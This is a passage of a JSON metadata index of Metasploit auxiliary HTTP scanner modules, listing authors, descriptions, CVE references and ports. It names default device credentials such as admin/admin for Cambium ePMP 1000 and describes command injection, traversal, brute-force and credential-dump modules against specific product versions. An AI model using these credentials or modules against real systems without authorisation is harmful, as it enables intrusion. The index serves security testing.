"auxiliary_scanner/http/enum_wayback": {
"name": "Archive.org Stored Domain URLs",
"full_name": "auxiliary/scanner/http/enum_wayback",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module pulls and parses the URLs stored by Archive.org for the purpose of\n replaying during a web assessment. This is useful for finding unlinked and old pages.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/enum_wayback.rb",
"is_install_path": true,
"ref_name": "scanner/http/enum_wayback",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/epmp1000_dump_config": {
"name": "Cambium ePMP 1000 Dump Device Config",
"full_name": "auxiliary/scanner/http/epmp1000_dump_config",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module dumps Cambium ePMP 1000 device configuration file. An\n ePMP 1000 box has four (4) login accounts - admin/admin, installer/installer,\n home/home, and readonly/readonly. This module requires any one of the following\n login credentials - admin / installer / home - to dump device configuration\n file.",
"references": [
"URL-http://ipositivesecurity.com/2015/11/28/cambium-epmp-1000-multiple-vulnerabilities/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-19 16:53:02 +0000",
"path": "/modules/auxiliary/scanner/http/epmp1000_dump_config.rb",
"is_install_path": true,
"ref_name": "scanner/http/epmp1000_dump_config",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/epmp1000_dump_hashes": {
"name": "Cambium ePMP 1000 'ping' Password Hash Extractor (up to v2.5)",
"full_name": "auxiliary/scanner/http/epmp1000_dump_hashes",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits an OS Command Injection vulnerability in Cambium\n ePMP 1000 (<v2.5) device management portal. It requires any one of the\n following login credentials - admin/admin, installer/installer, home/home - to\n dump system hashes.",
"references": [
"URL-http://ipositivesecurity.com/2015/11/28/cambium-epmp-1000-multiple-vulnerabilities/",
"URL-https://support.cambiumnetworks.com/file/476262a0256fdd8be0e595e51f5112e0f9700f83"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-19 17:02:16 +0000",
"path": "/modules/auxiliary/scanner/http/epmp1000_dump_hashes.rb",
"is_install_path": true,
"ref_name": "scanner/http/epmp1000_dump_hashes",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/epmp1000_get_chart_cmd_exec": {
"name": "Cambium ePMP 1000 'get_chart' Command Injection (v3.1-3.5-RC7)",
"full_name": "auxiliary/scanner/http/epmp1000_get_chart_cmd_exec",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits an OS Command Injection vulnerability in Cambium\n ePMP 1000 (v3.1-3.5-RC7) device management portal. It requires any one of the\n following login credentials - admin/admin, installer/installer, home/home - to\n execute arbitrary system commands.",
"references": [
"CVE-2017-5255",
"URL-https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-23 00:14:27 +0000",
"path": "/modules/auxiliary/scanner/http/epmp1000_get_chart_cmd_exec.rb",
"is_install_path": true,
"ref_name": "scanner/http/epmp1000_get_chart_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/epmp1000_ping_cmd_exec": {
"name": "Cambium ePMP 1000 'ping' Command Injection (up to v2.5)",
"full_name": "auxiliary/scanner/http/epmp1000_ping_cmd_exec",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits an OS Command Injection vulnerability in Cambium\n ePMP 1000 (<v2.5) device management portal. It requires any one of the\n following login credentials - admin/admin, installer/installer, home/home - to\n execute arbitrary system commands.",
"references": [
"URL-http://ipositivesecurity.com/2015/11/28/cambium-epmp-1000-multiple-vulnerabilities/",
"URL-https://support.cambiumnetworks.com/file/476262a0256fdd8be0e595e51f5112e0f9700f83"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-23 00:14:27 +0000",
"path": "/modules/auxiliary/scanner/http/epmp1000_ping_cmd_exec.rb",
"is_install_path": true,
"ref_name": "scanner/http/epmp1000_ping_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/epmp1000_reset_pass": {
"name": "Cambium ePMP 1000 Account Password Reset",
"full_name": "auxiliary/scanner/http/epmp1000_reset_pass",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits an access control vulnerability in Cambium ePMP\n device management portal. It requires any one of the following non-admin login\n credentials - installer/installer, home/home - to reset password of other\n existing user(s) including 'admin'. All versions <=3.5 are affected. This\n module works on versions 3.0-3.5-RC7.",
"references": [
"CVE-2017-5254",
"URL-https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-23 00:14:27 +0000",
"path": "/modules/auxiliary/scanner/http/epmp1000_reset_pass.rb",
"is_install_path": true,
"ref_name": "scanner/http/epmp1000_reset_pass",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/epmp1000_web_login": {
"name": "Cambium ePMP 1000 Login Scanner",
"full_name": "auxiliary/scanner/http/epmp1000_web_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for Cambium ePMP 1000 management login portal(s), and\n attempts to identify valid credentials. Default login credentials are -\n admin/admin, installer/installer, home/home and readonly/readonly.",
"references": [
"URL-http://ipositivesecurity.com/2015/11/28/cambium-epmp-1000-multiple-vulnerabilities/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-19 16:48:41 +0000",
"path": "/modules/auxiliary/scanner/http/epmp1000_web_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/epmp1000_web_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/error_sql_injection": {
"name": "HTTP Error Based SQL Injection Scanner",
"full_name": "auxiliary/scanner/http/error_sql_injection",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies the existence of Error Based SQL injection issues. Still requires a lot of work",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/error_sql_injection.rb",
"is_install_path": true,
"ref_name": "scanner/http/error_sql_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/es_file_explorer_open_port": {
"name": "ES File Explorer Open Port",
"full_name": "auxiliary/scanner/http/es_file_explorer_open_port",
"rank": 300,
"disclosure_date": "2019-01-16",
"type": "auxiliary",
"author": [
"小荷才露尖尖角",
"moonbocal",
"fs0c131y",
"h00die"
],
"description": "This module connects to ES File Explorer's HTTP server to run\n certain commands. The HTTP server is started on app launch, and is available\n as long as the app is open. Version 4.1.9.7.4 and below are reported vulnerable\n This module has been tested against 4.1.9.5.1.",
"references": [
"CVE-2019-6447",
"URL-https://www.ms509.com/2016/03/01/es-explorer-vul/",
"URL-https://github.com/fs0c131y/ESFileExplorerOpenPortVuln",
"URL-https://twitter.com/fs0c131y/status/1085460755313508352"
],
"platform": "",
"arch": "",
"rport": 59777,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-26 19:39:17 +0000",
"path": "/modules/auxiliary/scanner/http/es_file_explorer_open_port.rb",
"is_install_path": true,
"ref_name": "scanner/http/es_file_explorer_open_port",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/etherpad_duo_login": {
"name": "EtherPAD Duo Login Bruteforce Utility",
"full_name": "auxiliary/scanner/http/etherpad_duo_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for EtherPAD Duo login portal, and\n performs a login bruteforce attack to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/etherpad_duo_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/etherpad_duo_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/f5_bigip_virtual_server": {
"name": "F5 BigIP HTTP Virtual Server Scanner",
"full_name": "auxiliary/scanner/http/f5_bigip_virtual_server",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Denis Kolegov <dnkolegov@gmail.com>",
"Oleg Broslavsky <ovbroslavsky@gmail.com>",
"Nikita Oleksov <neoleksov@gmail.com>"
],
"description": "This module scans for BigIP HTTP virtual servers using banner grabbing. BigIP system uses\n different HTTP profiles for managing HTTP traffic and these profiles allow to customize\n the string used as Server HTTP header. The default values are \"BigIP\" or \"BIG-IP\" depending\n on the BigIP system version.",
"references": [
"URL-https://www.owasp.org/index.php/SCG_D_BIGIP"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb",
"is_install_path": true,
"ref_name": "scanner/http/f5_bigip_virtual_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/f5_mgmt_scanner": {
"name": "F5 Networks Devices Management Interface Scanner",
"full_name": "auxiliary/scanner/http/f5_mgmt_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Denis Kolegov <dnkolegov@gmail.com>",
"Oleg Broslavsky <ovbroslavsky@gmail.com>",
"Nikita Oleksov <neoleksov@gmail.com>"
],
"description": "This module scans for web management interfaces of the following F5 Networks devices:\n BigIP, BigIQ, Enterprise Manager, ARX, and FirePass.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/f5_mgmt_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/file_same_name_dir": {
"name": "HTTP File Same Name Directory Scanner",
"full_name": "auxiliary/scanner/http/file_same_name_dir",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies the existence of files\n in a given directory path named as the same name of the\n directory.\n\n Only works if PATH is different than '/'.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/file_same_name_dir.rb",
"is_install_path": true,
"ref_name": "scanner/http/file_same_name_dir",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/files_dir": {
"name": "HTTP Interesting File Scanner",
"full_name": "auxiliary/scanner/http/files_dir",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies the existence of interesting files\n in a given directory path.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/files_dir.rb",
"is_install_path": true,
"ref_name": "scanner/http/files_dir",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/fortinet_ssl_vpn": {
"name": "Fortinet SSL VPN Bruteforce Login Utility",
"full_name": "auxiliary/scanner/http/fortinet_ssl_vpn",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Max Michels <kontakt@maxmichels.de>"
],
"description": "This module scans for Fortinet SSL VPN web login portals and\n performs login brute force to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-02-19 22:33:10 +0000",
"path": "/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb",
"is_install_path": true,
"ref_name": "scanner/http/fortinet_ssl_vpn",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/frontpage_credential_dump": {
"name": "FrontPage .pwd File Credential Dump",
"full_name": "auxiliary/scanner/http/frontpage_credential_dump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Aditya K Sood <Aditya K Sood @adityaksood>",
"Stephen Haywood <Stephen Haywood @averagesecguy>"
],
"description": "This module downloads and parses the '_vti_pvt/service.pwd',\n '_vti_pvt/administrators.pwd', and '_vti_pvt/authors.pwd' files on a FrontPage\n server to find credentials.",
"references": [
"PACKETSTORM-11556",
"URL-https://insecure.org/sploits/Microsoft.frontpage.insecurities.html",
"URL-http://sparty.secniche.org/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-21 12:44:10 +0000",
"path": "/modules/auxiliary/scanner/http/frontpage_credential_dump.rb",
"is_install_path": true,
"ref_name": "scanner/http/frontpage_credential_dump",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/frontpage_login": {
"name": "FrontPage Server Extensions Anonymous Login Scanner",
"full_name": "auxiliary/scanner/http/frontpage_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module queries the FrontPage Server Extensions and determines whether anonymous access is allowed.",
"references": [
"URL-http://en.wikipedia.org/wiki/Microsoft_FrontPage",
"URL-http://msdn2.microsoft.com/en-us/library/ms454298.aspx"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/frontpage_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/frontpage_login",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/gavazzi_em_login_loot": {
"name": "Carlo Gavazzi Energy Meters - Login Brute Force, Extract Info and Dump Plant Database",
"full_name": "auxiliary/scanner/http/gavazzi_em_login_loot",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication. The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. This db file contains information such as power/energy utilization data, tariffs, and revenue statistics. Vulnerable firmware versions include - VMU-C EM prior to firmware Version A11_U05 and VMU-C PV prior to firmware Version A17.",
"references": [
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-17-012-03"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/gavazzi_em_login_loot.rb",
"is_install_path": true,
"ref_name": "scanner/http/gavazzi_em_login_loot",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/git_scanner": {
"name": "HTTP Git Scanner",
"full_name": "auxiliary/scanner/http/git_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nixawk",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module can detect situations where there may be information\n disclosure vulnerabilities that occur when a Git repository is made\n available over HTTP.",
"references": [
"URL-https://github.com/git/git/blob/master/Documentation/technical/index-format.txt"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/git_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/git_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/gitlab_login": {
"name": "GitLab Login Utility",
"full_name": "auxiliary/scanner/http/gitlab_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module attempts to login to a GitLab instance using a specific user/pass.",
"references": [
"URL-https://labs.mwrinfosecurity.com/blog/2015/03/20/gitlab-user-enumeration/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/gitlab_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/gitlab_login",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/gitlab_user_enum": {
"name": "GitLab User Enumeration",
"full_name": "auxiliary/scanner/http/gitlab_user_enum",
"rank": 300,
"disclosure_date": "2014-11-21",
"type": "auxiliary",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "The GitLab 'internal' API is exposed unauthenticated on GitLab. This\n allows the username for each SSH Key ID number to be retrieved. Users\n who do not have an SSH Key cannot be enumerated in this fashion. LDAP\n users, e.g. Active Directory users will also be returned. This issue\n was fixed in GitLab v7.5.0 and is present from GitLab v5.0.0.",
"references": [
"URL-https://labs.mwrinfosecurity.com/blog/2015/03/20/gitlab-user-enumeration/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/gitlab_user_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/gitlab_user_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/glassfish_login": {
"name": "GlassFish Brute Force Utility",
"full_name": "auxiliary/scanner/http/glassfish_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Joshua Abraham <jabra@spl0it.org>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module attempts to login to GlassFish instance using username and password\n combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n It will also try to do an authentication bypass against older versions of GlassFish.\n Note: by default, GlassFish 4.0 requires HTTPS, which means you must set the SSL option\n to true, and SSLVersion to TLS1. It also needs Secure Admin to access the DAS remotely.",
"references": [
"CVE-2011-0807",
"OSVDB-71948"
],
"platform": "",
"arch": "",
"rport": 4848,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/glassfish_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/glassfish_login",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/glassfish_traversal": {
"name": "Path Traversal in Oracle GlassFish Server Open Source Edition",
"full_name": "auxiliary/scanner/http/glassfish_traversal",
"rank": 300,
"disclosure_date": "2015-08-08",
"type": "auxiliary",
"author": [
"Trustwave SpiderLabs",
"Dhiraj Mishra"
],
"description": "This module exploits an unauthenticated directory traversal vulnerability\n which exists in administration console of Oracle GlassFish Server 4.1, which is\n listening by default on port 4848/TCP.",
"references": [
"CVE-2017-1000028",
"URL-https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904",
"EDB-39441"
],
"platform": "",
"arch": "",
"rport": 4848,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-10-23 00:01:13 +0000",
"path": "/modules/auxiliary/scanner/http/glassfish_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/glassfish_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/goahead_traversal": {
"name": "Embedthis GoAhead Embedded Web Server Directory Traversal",
"full_name": "auxiliary/scanner/http/goahead_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matthew Daley",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in the Embedthis\n GoAhead Web Server v3.4.1, allowing an attacker to read arbitrary files\n with the web server privileges.",
"references": [
"CVE-2014-9707",
"PACKETSTORM-131156"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/goahead_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/goahead_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/groupwise_agents_http_traversal": {
"name": "Novell Groupwise Agents HTTP Directory Traversal",
"full_name": "auxiliary/scanner/http/groupwise_agents_http_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"r () b13$",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in Novell Groupwise.\n The vulnerability exists in the web interface of both the Post Office and the\n MTA agents. This module has been tested successfully on Novell Groupwise 8.02 HP2\n over Windows 2003 SP2.",
"references": [
"CVE-2012-0419",
"OSVDB-85801",
"BID-55648",
"URL-http://www.novell.com/support/kb/doc.php?id=7010772"
],
"platform": "",
"arch": "",
"rport": 7181,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/groupwise_agents_http_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/host_header_injection": {
"name": "HTTP Host Header Injection Detection",
"full_name": "auxiliary/scanner/http/host_header_injection",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jay Turla",
"Medz Barao"
],
"description": "Checks if the host is vulnerable to Host header injection",
"references": [
"CVE-2016-10073",
"URL-http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/host_header_injection.rb",
"is_install_path": true,
"ref_name": "scanner/http/host_header_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/hp_imc_bims_downloadservlet_traversal": {
"name": "HP Intelligent Management BIMS DownloadServlet Directory Traversal",
"full_name": "auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a lack of authentication and a directory traversal in HP\n Intelligent Management, specifically in the DownloadServlet from the BIMS component,\n in order to retrieve arbitrary files with SYSTEM privileges. This module has been\n tested successfully on HP Intelligent Management Center 5.1 E0202 with BIMS 5.1 E0201\n over Windows 2003 SP2.",
"references": [
"CVE-2013-4823",
"OSVDB-98248",
"BID-62897",
"ZDI-13-239"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/hp_imc_bims_downloadservlet_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/hp_imc_faultdownloadservlet_traversal": {
"name": "HP Intelligent Management FaultDownloadServlet Directory Traversal",
"full_name": "auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a lack of authentication and a directory traversal in HP\n Intelligent Management, specifically in the FaultDownloadServlet, in order to\n retrieve arbitrary files with SYSTEM privileges. This module has been tested\n successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.",
"references": [
"CVE-2012-5202",
"OSVDB-91027",
"BID-58675",
"ZDI-13-051"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/hp_imc_faultdownloadservlet_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/hp_imc_ictdownloadservlet_traversal": {
"name": "HP Intelligent Management IctDownloadServlet Directory Traversal",
"full_name": "auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a lack of authentication and a directory traversal in HP\n Intelligent Management, specifically in the IctDownloadServlet, in order to\n retrieve arbitrary files with SYSTEM privileges. This module has been tested\n successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.",
"references": [
"CVE-2012-5204",
"OSVDB-91029",
"BID-58676",
"ZDI-13-053"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/hp_imc_ictdownloadservlet_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/hp_imc_reportimgservlt_traversal": {
"name": "HP Intelligent Management ReportImgServlt Directory Traversal",
